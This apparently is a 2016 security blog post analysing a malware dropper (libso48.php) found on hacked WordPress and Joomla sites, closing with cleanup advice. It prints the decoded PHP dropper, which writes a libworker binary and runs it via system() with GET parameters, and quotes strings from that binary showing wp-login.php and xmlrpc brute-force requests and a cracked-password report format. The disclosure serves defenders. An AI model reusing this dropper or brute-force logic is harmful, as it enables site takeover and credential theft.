-google-ads-
2016
01.03

In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.

The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:

domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC

The using UserAgent is with the String „–user-agent“:

" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"

 

The bad files check if the Server runs at x32 or x64 and compile a file libworker.so

The libworker.so File makes the attacks.

 

Code from the libso48.php (decoded):

<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;
$so64 = Hex-Code;
//hexcode decoded start
............
fork
INFO Started brute forcing.

path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s) 
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s) 
Error.
<INFO> (%s:%d: errno: %s) 
Started xml rpc brute force
.........
//hexcode decoded end
 
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
    fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>

The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/

On the Hexcode, which was written in the libworker.so file had the following code inside:

......

%s
}{
  "type" : "WPBF_RESPONSE",
  "success" : false,
  "site" : "%s",
  "user" : "%s"
}
Sending: %s
{
  "type" : "WPBF_RESPONSE",
  "success" : true,
  "site" : "%s",
  "user" : "%s",
  "pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s) 

You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.

If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.

-google-ads-

Die Kommentarfunktion ist hier derzeit deaktiviert.

Translate »